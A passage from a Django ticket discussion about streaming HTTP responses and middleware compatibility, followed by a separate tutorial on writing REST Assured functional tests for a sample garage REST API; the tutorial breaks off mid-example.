attached. This also has a warning (feel free to exclude if you wish!) for users of the function that its compression performance is not as good as compress_string (though obviously it has other advantages). As a final note, in our local installation we use the Z_FULL_FLUSH option on zfile.flush(), with some penalty in compression performance, so that browsers can start rendering the streaming output immediately, without having to wait for further bytes to complete decompression. This may not be an appropriate change for all installations, so I didn't include it here, though it might be useful as an option. Hope this is helpful- Changed 9 years ago by Bug fix for invalid compression output in compress_sequence comment:17 Changed 8 years ago by comment:18 Changed 8 years ago by I just updated the patch to work with trunk r11381 and also rolled in the compress_sequence fix. I also removed the set_content_length parts for WSGI, since it appears to be valid in HTTP 1.0/1.1 and WSGI to omit this header when the content length is not known. The full test suite passes. I've been using this patch in my local branch of Django for over a year now, first with Apache/mod_python, and now with Apache/mod_wsgi, and have not noticed any ill-effects. I've discussed this with ccahoon recently who is working on the http-wsgi-improvements branch, and I cannot see a way for any middleware to ever work with a streaming response (when possible and appropriate, e.g. gzip) without having a hook back into the HttpResponse object where it can alter the existing generator in-place. I think this is a fairly useful ability for middleware, so I'd still like to see any generator passed in as content to HttpResponse exposed for middleware to inspect and replace, or automatically disable any functionality that is irrelevant to generator content (e.g. etags). I don't believe that this is the complete solution. There will still be cases where middleware *must* consume the content in order to function (e.g. csrf, which is conditionally applied to HTML content types). For these cases there needs to be a way for users to disable specific middleware for a specific response, so that streaming can still function, and this may also be useful for other purposes. I suggest that we simply add an attribute HttpResponse.disabled_middleware (list or tuple). Any installed middleware specified there should be bypassed when applying response middleware. Django could then ship with an HttpStreamingResponse class that disables any included middleware that is known not to work with generator content, and this could easily be subclassed and updated by users who need to disable any 3rd party middleware to create a streaming response. My own use-case for streaming responses is that I often need to export large sets of model data in CSV format, sometimes manipulating the data as I go which can result in a significant wait before the entire content is consumed. Besides the also significant memory usage, the delay before content delivery can start often causes browser timeouts. I'm hesitant to simply increase the timeout because it's not really solving the problem, and users will often think that something is wrong if a download doesn't start quickly. My only alternative without streaming responses is to look into an offline job queue solution, which seems further outside of the scope of django, and introduces a requirement for notifying users when their download is complete. Changed 8 years ago by comment:19 Changed 8 years ago by Changeset [11449] on the branch sco2009/http-wsgi-improvements has my attempt at solving this problem, using a new response class (http.HttpResponseStreaming) and class attributes for streaming-safe response middleware. It has tests and docs. I am not sure how I feel about the test coverage, but it does show that at least it operates correctly as an HttpResponse, and that the content doesn't get consumed on initialization of the response. I used code and ideas from the existing patches here with some additional changes. comment:20 Changed 8 years ago by FYI - the use of HttpResponse.content in the CSRF middleware should hopefully go away completely in Django 1.4. Before then (Django 1.2 hopefully), it will be isolated in a deprecated middleware, replaced by a streaming friendly method. See CsrfProtection for more. comment:21 Changed 8 years ago by For people with problems with file streaming you can use a simple workaround comment:22 Changed 8 years ago by Bumping from 1.2: there's still no agreement about the correct approach here. comment:23 Changed 7 years ago by Changed 7 years ago by comment:24 Changed 7 years ago by Just updated the patch to apply cleanly against trunk again. Removed (now) redundant changes to CSRF middleware (it no longer breaks streaming). Also made _get_content_generator() consistent with _get_content() in that it now calls smart_str() on each chunk. This was causing me problems when passing a generator that yielded unicode strings instead of bytecode strings, which was breaking compress_sequence(). comment:25 Changed 6 years ago by comment:26 Changed 6 years ago by It's clear to me that we have to do *something* about this (though *what* is far from obvious). Changed 6 years ago by Patch for Django 1.3.1 (uses md5_constructor instead of hashlib.md5) comment:27 Changed 6 years ago by It doesn't advance the discussion on what to do next, but the patch I just added should let people like me who wanted to painlessly apply mrmachine's patch to Django 1.3.1, do so. comment:28 Changed 6 years ago by comment:29 Changed 5 years ago by I've updated this patch on a branch at GitHub. If somebody can provide some concrete direction on the desired approach to resolve this (BDFL decision?), I'll try to add docs and tests as well. FYI, I've been using this patch in various incarnations for 4 years in production environments without any problems. My vote is still for allowing middleware to ask the response if it is streaming (generator as content) or not, and act accordingly. Either by changing their behaviour (to be compatible with streaming responses), doing nothing (to avoid breaking a streaming response), or forcing the response to consume the content (breaking the streaming response, but ensuring that the middleware always runs). comment:30 Changed 5 years ago by Updated this patch with some minor tweaks arising from IRC discussion with akaariai. Consume generator content on access, not assignment, so that generator content can still stream if no middleware has to access response.content. Raise PendingDeprecationWarning if you explicitly create an HttpResponse with streaming_content=True and then you (or some middleware) accesses response.content. Also see recent google developers discussion at comment:31 Changed 5 years ago by comment:32 Changed 5 years ago by I've updated the patch on my branch after further feedback from Aymeric Augustin and Anssi Kääriäinen on google groups discussion. The new patch refactors HttpResponse into HttpResponseBase and HttpResponse classes, and adds a new HttpStreamingResponse class. The HttpResponse class is simplified, and will consume iterator content whenever it is assigned, so that content can be safely accessed multiple times. The HttpStreamingResponse class exposes a new attribute, streaming_content. If you assign an iterator as streaming content, it will not be consumed until the response is iterated. The streaming content can be wrapped with a new generator (e.g. GZipMiddleware). The class prevents accidental assignment to the content attribute, to avoid confusing middleware that checks for a content attribute on response objects. Both classes use HttpResponseBase.make_bytes() to yield bytestrings when iterated, or a single bytestring when HttpResponse.content is accessed. This has simplified the implementation a little and removed some duplication. The close() method will now close all "file-like" content objects that were assigned to content or streaming_content, even if they are later replaced by different content. I think the old code would have left unclosed objects in this case. As an added bonus, you can now write() to both regular and streaming responses, when iterable or non-iterable content is assigned. For streaming responses, this just wraps the old streaming content with a new generator that yields an additional chunk at the end. For regular responses, assigned content is always normalised to a list now, so we can always append additional content. Middleware have been updated for compatibility with streaming responses. They now check responses for content or streaming_content before attempting to read or replace those attributes. New and 3rd party middleware should follow this example. We now have tests, too, and the full test suite passes here (2.7, OS X, SQLite). If this approach is accepted, I will add docs as well. comment:33 Changed 5 years ago by I've updated the branch again slightly, to use HttpStreamingResponse in the django.views.static.serve view. This is MASSIVELY faster on my local machine. It was slightly less of an improvement with GZipMiddleware enabled, but still a huge improvement compared to regular responses. I noticed when I was testing a site that hosts a 16MB iPad app. When I tried to install the app on the iPad from my local dev/test site, it was *extremely* slow. So I tried to download the file directly with Firefox on the same machine. Firefox was pulling it down at 60-70KB/s from localhost. When using HttpStreamingResponse instead, it's instantaneous. This is not only useful or noticeable with large files, but in general all images and other static content now loads MUCH faster with the dev server. Previously I could literally see even small files (60KB images) being progressively drawn to the page. Now it's all instant. Much nicer during development, especially on image heavy sites. I also found that django.http.utils.conditional_content_removal() was accessing response.content directly. I've updated that to work with regular and streaming responses. I couldn't find *any* tests for this function (or any in django.http.utils, so I added a new regression tests package, http_utils. comment:34 Changed 5 years ago by Quick skimming, and looks good. Could you create a pull request for easier reviewing? I will try to see if we can get this into 1.5. Unfortunately HTTP protocol isn't my strongest area, so help is welcome for reviewing... comment:35 Changed 5 years ago by I've added docs (patch should be complete, now), and opened a pull request. comment:36 Changed 5 years ago by There's a lot of history on this ticket; I reviewed as much as possible but couldn't read everything. Here's the current status of my review. I'm still at the design decision level; I haven't looked at the code yet. Hard requirements - The behavior of responses instantiated with a string must not change. - Below, I'm only considering responses instantiated with an iterator (often a generator). - Accessing request.contentin a regular HttpResponsemust exhaust the iterator and switch to a string-based response, which can be repeatedly accessed. Requirements - Discussions on CSRF middleware are moot for the reason explained by Luke in comment 20. - Discussions on the Content-Lengthheader can be ignored; it's optional and should be omitted if it can't be computed efficiently. - Discussions about conditionally disabling response middleware are outside of the scope of this ticket. - I'm -1 on HttpResponse.disabled_middlewareand all similar ideas, especially those requiring new settings — it's already way too difficult to figure out how to make middleware run in a meaningful order. Personal opinions - I consider streaming a large CSV export as a valid use case. Ultimately we should be able to stream from the database to the end user (I know this isn't possible with django.dbright now). The two other uses cases brought up in the latest discussion are also interesting. - I have absolutely no interest in fixing GzipMiddleware. I'd rather deprecate it, on the grounds that it's prohibited by PEP 3333 (and everyone should be using WSGI these days). Questions - One of the goals is to switch some parts of Django (e.g. django.views.static.serve) to streaming by default. This will be backward incompatible if the StreamingHttpResponseAPI isn't (at least temporarily) a superset of the HttpResponseAPI — specifically if accessing StreamingHttpResponse.contentraises an exception. - In the long run accessing StreamingHttpResponse.contentshould raise an exception, in order to guarantee the streaming behavior isn't accidentally broken by middleware. - This is why StreamingHttpResponseprovides the content in a different attribute: streaming_content - We could use a deprecation path to solve both issues at the same time: StreamingHttpResponse.contentwould work initially, but be deprecated and removed in 1.7. - Middleware must be able to provide different implementation for regular and streamed responses. - The suggested idiom is if hasattr(response, 'streaming_content'): .... This is more pythonic than the alternative if isinstance(response, StreamingHttpResponse): ...but it still looks wrong. - I'm considering adding get_streaming_responseto the response middleware API. If a response is a streaming response (which would be determined by duck-typing: hasattr(response, 'streaming_content')) and the middleware provides a get_streaming_responsemethod, that method would be called. Otherwise get_responsewould be called. Middleware authors who want to support streaming responses will have to implement that new method. comment:37 Changed 5 years ago by I assume you meant process_response() and process_streaming_response() methods for middleware classes? I think this would be much nicer to work with, and easier to explain to middleware authors than asking them to do hasattr(response, 'streaming_content'). But it would mean a little more work to refactor some of the bundled middleware classes. One thing you didn't mention is automatically closing file-like objects passed as content to regular and streaming responses. For streaming responses, Django should close them automatically, because users won't be able to. I think that we should do the same for regular responses as well for consistency and to avoid accidentally leaving files open. I'm not sure if this would be a backwards incompatible change, or if it would need a deprecation path, or if a deprecation path would be possible? I guess this could be implemented separately, if it decided to go ahead. comment:38 Changed 5 years ago by Yes I meant process_response. I didn't look at the closing issue yet, but it shouldn't be a problem. comment:39 Changed 5 years ago by Design decisions - I'm not going to refactor HttpResponseright now; there's another ticket about that. - I'm going to introduce a subclass of StreamingHttpResponsethat provides a deprecated content attribute, and use that class in the static serve view, to preserve backwards compatibility. - I'm going to introduce a response.streamingboolean flag to avoid the hasattr(response, 'streaming_content')pattern. - I'm not going to change the middleware API. comment:40 Changed 5 years ago by I've finished working on a patch. Barring unexpected objections, I'll commit it soon. To keep things manageable, I have made the minimum changes required to support streaming responses and enable them in the static serve view. I've taken care not to change the behavior of HttpResponse in any way. (I've saved that for #18796.) I've kept the tests written by mrmachine (with the exception of those that tested changes to HttpResponse). I've rewritten the code to make fewer changes, because I didn't trust myself enough to push such a large and sensitive patch in a single commit. Changed 5 years ago by comment:41 Changed 5 years ago by mrmachine's patch contained code to call close() on the response object when the generator terminates. This isn't necessary, because the WSGI server is already required to call that method when the response is finished. I removed it. comment:42 Changed 5 years ago by comment:43 follow-up: 44 Changed 5 years ago by Excellent. Very happy to see this committed. I have a couple of comments that may or may not be important. - We're not checking if the closeattribute on assigned content is callable before adding it to _closable_objects? Probably an edge case not worth worrying about, though. -. - There may still be a case for consuming iterators assigned to HttpResponse.contentimmediately, rather than on first access. Maybe after a deprecation period, though? If HttpResponse._containeris an iterator, the response can't be pickled by cache middleware. It would also allow additional content to be written to the response. This is probably an issue for another ticket, anyway. -). - The note in the docs about iterators being closed after the response is iterated as a point of difference from regular responses is not true anymore. We rely on WSGI to call close()on both regular and streaming responses. - The http_utilstest wasn't included? comment:44 Changed 5 years ago by - We're not checking if the closeattribute on assigned content is callable before adding it to _closable_objects? Probably an edge case not worth worrying about, though. Yes, primarily because callable is gone in Python 3. If someone has a custom file-like / iterator object that has a close attribute that isn't callable, that'll teach him a bit of API design principles :) -? I'm not sure which part of that blog post you're referring to. This sentence indicates that close() should be called once: The intent of that statement, at least from the perspective of the WSGI server, is that close() only be called once all content has been consumed from the iterable and that content has been sent to the client. Furthermore, close() can usually be called on objects that are already closed; it just does nothing. -. That's what #18796 is about: normalizing the conversion of the content to bytes (which is moot because content is already bytes in 99.99% of responses). I'll copy your remark over there. - There may still be a case for consuming iterators assigned to HttpResponse.contentimmediately, rather than on first access. Maybe after a deprecation period, though? If HttpResponse._containeris an iterator, the response can't be pickled by cache middleware. If that's true, it's a bug of the cache middleware, which can easily be fixed by making it access response.content. If that bug wasn't reported yet, could you create a new ticket? It would also allow additional content to be written to the response. This is probably an issue for another ticket, anyway. Allowing writes to a regular response instantiated with an iterator is #6527. I've uploaded a patch extracted from your work over there. -). This never came into the discussion until now, could you create a new ticket for this feature request? - The note in the docs about iterators being closed after the response is iterated as a point of difference from regular responses is not true anymore. We rely on WSGI to call close()on both regular and streaming responses. I'll fix that. - The http_utilstest wasn't included? Oops, my git-fu must have failed me. I'll commet them separately. comment:45 Changed 5 years ago by comment:46 Changed 5 years ago by comment:47 Changed 5 years ago by comment:48 Changed 5 years ago by It should be noted that the Apache2 webserver by default (at least on Ubuntu Linux) enables mod_deflate that suffers from the same issue and thus effectively prevents streaming. With mod_deflate disabled, streaming with Django works very nice. Changed to DDN after comments from Malcolm and Ivan on google groups. The arguments against are that: 3rd party middleware authors will be unable to access the content for an HttpResponsebecause it's content may be an un-consumable generator; middleware will repetitively be required to replace HttpResponse.contentwith a string if a generator is consumed; Content-Length*must* always be set with WSGI. The argument for is that 3rd party middleware should have the *option* of working with HttpResponseobjects which have an un-consumable generator (e.g. GZipMiddleware). If middleware authors fail or choose not to account for this possibility, behaviour will remain as it is today, as it would be if generators were consumed immediately when instantiating an HttpResponseobject. A possible alternative raised by Malcolm is to add a way to bypass process_responsein middleware (or bypass all middleware) for specific HttpResponseobjects. However, this would disallow potentially useful middleware that *can* work without consuming the content generator (e.g. GZipMiddleware). I've updated the patch with a few improvements: HttpResponse.content_generatorwhich will return either a generator if one is present. Middleware authors can use this to check for the existence of, or actually get the content generator. We no longer need to access the private attributes HttpResponse._is_stringor HttpResponse._containerfrom middleware. We can still assign a string or generator to HttpResponse.contentin the case where we need to replace the content or generator in middleware. HttpResponse.contentwill now consume any content generator that exists and replace HttpResponse._containerwith the resulting string, ensuring that the generator is only consumed once. set_content_lengthmethod to WSGIHandler.response_fixesto ensure that Content-Lengthis *always* set with WSGI. Although I have found some discussion to support the removal of Content-Lengthby WSGI servers with specific examples to GZipped content. Requiring Content-Lengthon every single response which has content with WSGI will make streaming a response impossible under any circumstances. This is quite useful functionality (exporting large sets of data), so if it turns out to be acceptable to stream content through WSGI without a Content-Lengthheader (as opposed to an incorrect Content-Lengthheader), or the WSGI spec changes to allow for this, I'd love to see the WSGIHandler.set_content_lengthmethod removed. FYI, I have tested this without HttpResponse.set_content_lengthand with GZipMiddlewareenabled on Apache with mod_wsgi and it does work (stream) as intended. Personally I don't feel that it is an unreasonable restriction to place on middleware authors by asking them to make use of HttpResponse.content_generator*if* they want or need their middleware to work with streaming content. It's also not unreasonable for developers to check that the middleware they are using will work with streaming content, if they require streaming content. After all, some middleware by their very nature will not work with streaming content.
https://code.djangoproject.com/ticket/7581?cversion=0&cnum_hist=39
CC-MAIN-2018-05
refinedweb
6,099
55.64
IntelliJ IDEA is an awesome IDE, and a lesser known and used feature is Live Templates. Live Templates enable you to use code snippets with just a few keystrokes. A lot of great ones are provided out-of-the-box by IntelliJ. You can view them using the shortcut press Double Shift and then typing Live Templates. The shortcut works regardless of the OS you're currently using (and I am too lazy to specify OS specific menus). Some of the examples of Live Templates are: Typing psvm replaces it with public static void main(String[] args){ } Typing psfs magically turns it into public static final String I was recently refactoring a lot of Classes and I had to replace a lot of legacy logging initialization statements to using slf4j logging library like the following: import org.slf4j.Logger; import org.slf4j.LoggerFactory; public class LoggerTest { public static final Logger logger = LoggerFactory.getLogger(LoggerTest.class); } I had more than 30 different classes to refactor as the above, and I certainly didn't want to painstakingly write everything by hand again (confirms that I'm lazy). Fortunately, IntelliJ Live Templates came to my rescue! I fired up the Live Templates menu using the shortcut mentioned above, and clicked on the + button at the top right. I then clicked on Live Template button. The UI now points to the bottom which asks you to put an abbreviation. Let's input the abbreviation as psfl which stands for public static final Logger, which can be also put in the description. Write the following code in the Template text box: public static final Logger logger = LoggerFactory.getLogger(); But hang on, the IDE gives us a warning to define a context where it would be used at. We want the template to be only used in Java, so we click on the Define button, and select Java. You may now notice the IDE now applies syntax highlighting on the template. Wait, we are still not there yet. I certainly don't want to manually write every class name inside the getLogger function! At this point, I was not sure how I could achieve that. Cue in a bit of googling, stackoverflow again came to the rescue. I found the following answer: public static final org.slf4j.Logger logger = org.slf4j.LoggerFactory.getLogger($CLASS_NAME$); $END$ So I copy-pasted the code in my template screen(what did you expect? :P) You'd then need to define what $CLASS_NAME$ means. To do that, click on the Edit Variables button and select className() in the Expression box. The $END$ variable means where you want your cursor at, after the template is applied. Click on Apply and Ok. We're done! Fire up your classes and refactor with 10x speed! Relevant link: Discussion (1) Another useful one- you can use the $SELECTION$ argument in a live template, so that when you have some code highlighted, you can press ctrl alt T and wrap the selection in your template code. For example: Objects.requireNonNull($SELECTION$)
https://dev.to/darshitpp/using-intellij-idea-live-templates-2bce
CC-MAIN-2022-27
refinedweb
505
64.81
On Mon, Jun 2, 2008 at 3:01 PM, Hans Meine <meine at informatik.uni-hamburg.de> wrote: > Hi Roman, > > after reporting to Gustavo that pybindgen does not support unnamed structs, I > tried pyplusplus and found the same (OK, not the same - pyplusplus gracefully > skips the members with the two warnings "Py++ can not export unnamed > variables" and "Py++ can not export unnamed classes"). Actually, there are > two problems: > > 1) py++ generates the following code, which does not mention the "low" > and "high" members wrapped in the struct: > > bp::class_< Word >( "Word" ) > .def_readwrite( "word", &Word::word ); > > This should be "easy to fix" - py++ would need to descend into the struct and > add > .def_readwrite( "low", &Word::low ) > .def_readwrite( "high", &Word::high ) py++ is not going support unnamed classes, unless someone will submit the patch. Next code does the job (taken as-is from Python-Ogre project) def fix_unnamed_classes( classes, namespace ): for unnamed_cls in classes: named_parent = unnamed_cls.parent if not named_parent.name: named_parent = named_parent.parent if not named_parent or named_parent.ignore: continue for mvar in unnamed_cls.public_members: if not mvar.name: continue if mvar.ignore: continue if declarations.is_array (mvar.type): template = '''def_readonly("%(mvar)s", &%(ns)s::%(parent)s::%(mvar)s)''' else: template = '''def_readwrite("%(mvar)s", &%(ns)s::%(parent)s::%(mvar)s)''' named_parent.add_code( template % dict( ns=namespace, mvar=mvar.name, parent=named_parent.name ) ) It takes list of unnamed classes. > However, the next problem is fatal: > > 2) boost::python::class_ only works for structs and classes, but not for > unions. I am getting an error from is_polymorphic: Thanks for bug reporting. I fixed this problem, by excluding unions from being exposed :-) -- Roman Yakovenko C++ Python language binding
https://mail.python.org/pipermail/cplusplus-sig/2008-June/013294.html
CC-MAIN-2016-44
refinedweb
275
51.14
Introduction Having a large collection of unit tests that verify the behaviour of Java classes is only the first step to a sound testing strategy. After all, the fact that individual Java classes work successfully in isolation does not mean that the application itself will also work correctly ,when all these classes are bundled together. In addition to basic unit tests, we also need integration tests (tests that focus on modules), functional tests (end-to-end tests that use the application as deployed), and even user acceptance tests (tests that examine the GUI as seen by the user). In this tutorial, we will deal with functional tests that do not work directly with Java classes. Instead, they connect to the HTTP endpoints offered by the application server and mimic the role of another client or the browser. Most applications today expose their API as a set of HTTP endpoints that send and receive JSON data. These endpoints can be used either from the GUI layer (i.e. Javascript front-end frameworks) or other back-end applications in different technologies. Making sure that these HTTP endpoints work according to the specifications is an essential requirement if we want to cover the whole development lifecycle and follow the testing pyramid paradigm correctly. We will cover: - Downloading and setting up REST Assured – a Java library for testing HTTP endpoints, - Simple tests that perform one interaction with the HTTP endpoint, - More complex functional tests that require a “conversation” between the client and the HTTP endpoint, and - Different ways of posting requests and evaluating responses. Note that REST Assured treats our REST application as a Black box during testing. All REST Assured tests send a network request to our application, get a response back, and compare it against a predetermined result. The fact that the application under test is written in Java is irrelevant to REST Assured. REST Assured bases its tests only on JSON and HTTP, which are language-independent technologies. We can use REST Assured to write tests for applications written with Python, Ruby, .NET etc. As long as our application offers an HTTP endpoint, REST Assured can test it regardless of the implementation programming language. It is convenient for us to use REST Assured for Java applications, as we’ll use the same language both for implementation and our unit tests. Prerequisites It is assumed that we already have a Java project that offers its services over HTTP/JSON when deployed to an application server. We will need: - A sample Java project that already has an HTTP/REST/JSON API, - A valid pom.xmlfile that builds the project, - Maven installed (the command mvnshould be available in your command line), and - Internet access to download Maven dependencies. REST Assured works on top of JUnit, therefore JUnit knowledge is essential. Hamcrest knowledge is helpful but not required as we will only use some basic Hamcrest matchers. It is also assumed that we already know our way around basic Maven builds. If not, then feel free to consult its official documentation first. Introduction to REST Assured REST Assured is a Java library for validation of REST web services. It offers a friendly DSL (Domain specific Languages) that describes a connection to an HTTP endpoint and expected results. Comparing REST Assured to Other REST Java Libraries There are many Java libraries that allow us to write a REST client. It is also possible to use a simple HTTP client library and manually (de)serialize JSON data from/to the server. We could use a client library like Jersey or the Spring REST template to write REST unit tests. After all, it is very logical to use the same Java library both on the client and on the server side for the sake of simplicity. However, REST Assured has an additional testing DSL on top of its REST client that follows the BDD paradigm, making tests very readable. Here is a trivial example: import static com.jayway.restassured.RestAssured.given; import org.junit.Test; public class HelloWorldRestAssured { @Test public void makeSureThatGoogleIsUp() { given().when().get("").then().statusCode(200); } } This JUnit test connects to Google, performs a GET call and makes sure that HTTP code 200/success is returned. Notice the complete absence of the usual JUnit assert statements. REST Assured takes care of this for us and will automatically pass/fail this test according to the error code. The flexibility of the given(), when(), then() methods will become apparent in the following sections of the tutorial. Setting up REST Assured Using the REST Assured library in a Java project is very straightforward, as it is already a part of Maven central. We need to modify our pom.xml file as follows: <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>4.12</version> <scope>test</scope> </dependency> <dependency> <groupId>org.hamcrest</groupId> <artifactId>hamcrest-all</artifactId> <version>1.3</version> <scope>test</scope> </dependency> <dependency> <groupId>com.google.code.gson</groupId> <artifactId>gson</artifactId> <version>2.6.2</version> <scope>test</scope> </dependency> <dependency> <groupId>com.jayway.restassured</groupId> <artifactId>rest-assured</artifactId> <version>2.9.0</version> <scope>test</scope> </dependency> </dependencies> REST Assured works on top of JUnit and therefore assumes that it’s installed. Hamcrest Matchers are optional, and are not strictly needed for REST Assured. They allow us to write more expressive unit tests. Gson is automatically used by REST Assured for JSON (de)serialization, as we will see in the examples. Rest Assured can also work with Jackson, if that is available in the classpath. With the compile time dependencies out of the way, we should also define a base Java class that will allow us to select the server that contains the REST endpoints. We can name this class as we see fit, but it is important since it will be used as a base class for all REST Assured tests. public class FunctionalTest { @BeforeClass public static void setup() { String port = System.getProperty("server.port"); if (port == null) { RestAssured.port = Integer.valueOf(8080); } else{ RestAssured.port = Integer.valueOf(port); } String basePath = System.getProperty("server.base"); if(basePath==null){ basePath = "/rest-garage-sample/"; } RestAssured.basePath = basePath; String baseHost = System.getProperty("server.host"); if(baseHost==null){ baseHost = ""; } RestAssured.baseURI = baseHost; } } This class prepares REST Assured with a default target of which is the context root of the application we are going to test. At the same time, it also allows us to set up a different web context using command line arguments. For example, to change this to another server and port we could run. mvn test -Dserver.port=9000 -Dserver.host= This will run the same suite of tests for an application deployed at. Thus a build server could run our REST Assured test against different environments. HTTP API of a Sample Java Application For this tutorial, we will test a sample REST application that deals with a garage. The garage has 150 spaces for cars. The API can be summarized as follows: - GET call at /garage returns information of filled/free car parking slots, - POST call at /garage/slots parks a new car at the next free parking slot, - responses it gets are also in the JSON format. REST Assured also supports XML but for this tutorial we will focus on JSON. Testing HTTP Error Codes We’ll start with REST Assured by verifying the HTTP error codes of our application. First of all, we want to verify that our application has deployed correctly by calling the /garage URL and making sure that the success – 200 HTTP result is returned. Here is the unit test: public class GarageRestTest extends FunctionalTest{ @Test public void basicPingTest() { given().when().get("/garage").then().statusCode(200); } } Here, we extended the FunctionalTest class we’ve created before in order to define the context root of our application. This makes the test more readable as only the actual REST endpoint is contained in the test. Running this test will make sure that our application is up and running. Testing HTTP error codes becomes very useful when we want to make sure that our application behaves correctly, even when the input data is wrong. We already know that our garage has only 150 parking spaces. Therefore, a query to a parking space that exceeds this number should probably return a 404 (not found) error. Here is the respective code: @Test public void invalidParkingSpace() { given().when().get("/garage/slots/999") .then().statusCode(404); } Now that we know the basics, we can start verifying the body of HTTP responses as well. Testing GET Calls and Their Responses The majority of our REST functional tests will probably be simple GET calls that will make sure that the application is in a valid state. REST Assured offers several ways to examine the content of the response body. A basic call to the top level URL of our service (i.e. /garage) returns the following JSON object: { "name":"Acme garage", "info":{ "slots":150, "status":"open" } } The object holds the name of the garage and the number of total parking positions. The simplest way to test the body of a network response is by using string comparison. For example, to verify the name of our garage we can write the following: @Test public void verifyNameOfGarage() { given().when().get("/garage").then() .body(containsString("Acme garage")); } This example shows how well REST Assured works with Hamcrest matchers. The body() method is provided by REST Assured and deals with whatever is returned from the call. The containsString() method comes from Hamcrest and makes the test pass (or fail) if the body contains that string. The fact that REST Assured has built-in support for Hamcrest matchers means that we can write unit tests that closely resemble English sentences. This makes REST Assured tests very readable. It is possible to use REST Assured without Hamcrest matchers, but then our tests need more Java code for assertions. Here’s how we can test the response of the top URL in a more structured way: @Test public void verifyNameStructured() { given().when().get("/garage").then() .body("name",equalTo("Acme garage")); } Here, we explicitly tell REST Assured that we want to verify the name property of the JSON object to its exact value. Reading this test feels very natural because it is very close to an English sentence: “When we get /garage, then the response body should have a name property which is equal to Acme garage”. Internally, REST Assured uses Groovy and allows for Groovy expressions inside its API. Teaching the whole Groovy syntax is outside the scope of this tutorial. Suffice to say that Groovy allows us to access a JSON object using the standard dot notation as if it were a Java object. This allows us to test the inner part of the JSON object just by specifying its path inside the JSON object @Test public void verifySlotsOfGarage() { given().when().get("/garage").then(). body("info.slots",equalTo(150)) .body("info.status",equalTo("open")); } When given a path like info.slots, REST Assured will search for a info property inside the JSON object, follow it and then get a slots property which will finally be used for the unit test. This is a convenient way to examine only the part that we are interested in out of a big JSON object. Another thing to notice is the chaining of multiple body methods. This is one of the big advantages of the syntax of REST Assured as it makes possible multiple checks to work in unison. This unit test will succeed only if both checks on the response body are successful. In fact, we can chain any type of verifications offered by REST Assured together: @Test public void verifyTopLevelURL() { given().when().get("/garage").then() .body("name",equalTo("Acme garage")) .body("info.slots",equalTo(150)) .body("info.status",equalTo("open")) .statusCode(200); } Here, not only do we check all the properties of the JSON object, but we also want to make sure that the HTTP error code is 200 as shown in the previous section. Sending Test JSON Data with POST Calls We now know how to verify the READ operations of a REST API. Several REST endpoints also offer the ability to send data, via POST or PUT calls. REST Assured supports WRITE operations as well. A car enters the garage when its details are posted at /garage/slots. The JSON object expected by the service is the following: { "plateNumber":"xyx1111", "brand":"audi", "colour":"red" } We need a way to create this JSON request. In its simplest form, REST Assured can create JSON objects from plain Java maps. This makes posting data very straightforward: @Test public void aCarGoesIntoTheGarage() { Map<String,String> car = new HashMap<>(); car.put("plateNumber", "xyx1111"); car.put("brand", "audi"); car.put("colour", "red"); given() .contentType("application/json") .body(car) .when().post("/garage/slots").then() .statusCode(200); } Here, we’ve created a simple Java map and filled it with the values that represent JSON properties. Sending it with REST Assured requires the .contentType() method, but other than that, the map is passed directly to the body() method and REST Assured makes the conversion automatically to a JSON object. The response of the call is the status of the parking space. { "empty":false, "position":26 } This sample response shows us that parking slot with number 26 is now occupied. We can verify the “position” and “empty” properties using the chaining of body() methods, as already shown in the previous section. @Test public void aCarGoesIntoTheGarageStructured() { Map<String,String> car = new HashMap<>(); car.put("plateNumber", "xyx1111"); car.put("brand", "audi"); car.put("colour", "red"); given() .contentType("application/json") .body(car) .when().post("/garage/slots").then() .body("empty",equalTo(false)) .body("position",lessThan(150)); } The lessThan Hamcrest matcher will fail the test if the position property is ever above 150. Using Java maps as the payload of a request means that we can create with them any JSON object on the spot for a specific test. For bigger JSON objects, an alternative solution would be to directly use a Java object. This makes the intent of the test very clear and also allows for more flexible verifications. First, we need to define the car object in Java: public class Car { private String plateNumber; private String colour; private String brand; [...getters and setters removed for brevity...] } Now, we can construct a car object in a type safe manner and use that for our test instead of the Java map: @Test public void aCarObjectGoesIntoTheGarage() { Car car = new Car(); car.setPlateNumber("xyx1111"); car.setBrand("audi"); car.setColour("red"); given() .contentType("application/json") .body(car) .when().post("/garage/slots").then() .body("empty",equalTo(false)) .body("position",lessThan(150)); } The REST Assured methods are exactly the same as with the previous test. We’ve only changed the data rerquest to a Java object. In this trivial example, having a Java object instead of a map may not have clear advantages. In a real enterprise project where the JSON payload will be larger, it will be far easier to deal with objects instead of maps. Also, if our server code is already in Java, we can re-use the model objects directly from its source code. In our example, there is a very high possibility that the server code already contains the file Car.java and therefore it can be copied/imported to the source code of the REST Assured tests without any additional effort. Now that we have the car object, it is also very easy to look at the whole JSON response object. REST Assured can deserialize JSON data to Java objects in a similar manner: Again, we define a new Java object from the return result: public class Slot { private boolean empty; private int position; [...getters and setters removed for brevity...] } Now, we can use Java objects for both the request and the response of the call. @Test public void aCarIsRegisteredInTheGarage() { Car car = new Car(); car.setPlateNumber("xyx1111"); car.setBrand("audi"); car.setColour("red"); Slot slot = given() .contentType("application/json") .body(car) .when().post("/garage/slots") .as(Slot.class); assertFalse(slot.isEmpty()); assertTrue(slot.getPosition() < 150); } With the Slot object, we now have full control over the assert statements that test it and can write the usual JUnit verifications. Reusing Data from a Previous Call to the Next One All examples we have seen so far are self-contained in the sense that a single call is performed to the server and only a single response is evaluated. However, we need to examine a sequence of events and create calls that depend on the previous ones several times. In our sample application we need to test the event where a car leaves the garage. This is accomplished with a DELETE call at the /garage/slots/<slotNumber> URL. REST Assured can work with dynamic URLs as seen below: @Test public void aCarLeaves() { given().pathParam("slotID", 27) .when().delete("/garage/slots/{slotID}") .then().statusCode(200); } Our test creates a URL that specifies parking position 27 using the .pathParam() method. The problem with this unit test is its uncertainty. By the time it runs, position 27 might be empty or not. It’s possible that another test has already unparked the car. Rather than guessing and making the result of the test non-deterministic, it is a good practice to park the car ourselves instead, and use the returned position for the DELETE call. This way, the exact number of the parking space becomes irrelevant, and the test can work with ANY position assigned at the time or running. REST Assured can extract information from a response while still verifying the call on its own. Here is a deterministic test that does not depend on the number of the slot assigned to the incoming car: @Test public void aCarEntersAndThenLeaves() { Car car = new Car(); car.setPlateNumber("xyx1111"); car.setBrand("audi"); car.setColour("red"); int positionTakenInGarage = given() .contentType("application/json") .body(car) .when().post("/garage/slots").then() .body("empty",equalTo(false)) .extract().path("position"); given().pathParam("slotID", positionTakenInGarage) 